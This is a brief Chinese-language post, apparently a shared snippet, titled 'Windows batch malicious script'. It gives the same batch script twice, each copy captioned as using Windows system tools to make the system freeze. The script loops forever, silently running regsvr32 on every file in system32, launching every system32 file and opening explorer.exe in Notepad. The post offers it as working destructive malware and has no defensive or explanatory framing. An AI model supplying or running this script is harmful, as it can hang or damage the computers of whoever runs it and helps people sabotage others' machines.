windows 批处理恶意脚本
:die @start regsvr32.exe /s %windir%\system32\*.* >nul @start %windir%\system32\*.* >nul @start notepad %windir%\explorer.exe >nul goto die
利用windows系统工具造成系统卡死
:die @start regsvr32.exe /s %windir%\system32\*.* >nul @start %windir%\system32\*.* >nul @start notepad %windir%\explorer.exe >nul goto die
利用windows系统工具造成系统卡死